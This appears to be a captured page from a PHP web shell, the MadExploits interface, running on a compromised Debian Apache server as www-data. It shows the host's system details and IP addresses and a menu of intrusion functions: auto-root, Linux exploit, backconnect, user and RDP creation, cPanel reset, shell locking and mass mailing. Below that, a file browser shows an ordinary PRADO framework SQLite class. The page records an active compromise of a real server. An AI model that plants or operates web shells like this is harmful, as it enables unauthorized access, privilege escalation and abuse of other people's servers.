Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.107.223
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
framework /
Data /
Common /
Sqlite /
[ HOME SHELL ]
Name
Size
Permission
Action
TSqliteCommandBuilder.php
1.18
KB
-rw-r--r--
TSqliteMetaData.php
5.34
KB
-rw-r--r--
TSqliteTableColumn.php
1.34
KB
-rw-r--r--
TSqliteTableInfo.php
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TSqliteCommandBuilder.php
<?php /** * TSqliteCommandBuilder class file. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Data.Common */ Prado::using('System.Data.Common.TDbCommandBuilder'); /** * TSqliteCommandBuilder provides specifics methods to create limit/offset query commands * for Sqlite database. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.Common * @since 3.1 */ class TSqliteCommandBuilder extends TDbCommandBuilder { /** * Alters the sql to apply $limit and $offset. * @param string SQL query string. * @param integer maximum number of rows, -1 to ignore limit. * @param integer row offset, -1 to ignore offset. * @return string SQL with limit and offset. */ public function applyLimitOffset($sql, $limit=-1, $offset=-1) { $limit = $limit!==null ? intval($limit) : -1; $offset = $offset!==null ? intval($offset) : -1; if($limit > 0 || $offset > 0) { $limitStr = ' LIMIT '.$limit; $offsetStr = $offset >= 0 ? ' OFFSET '.$offset : ''; return $sql.$limitStr.$offsetStr; } else return $sql; } }
Close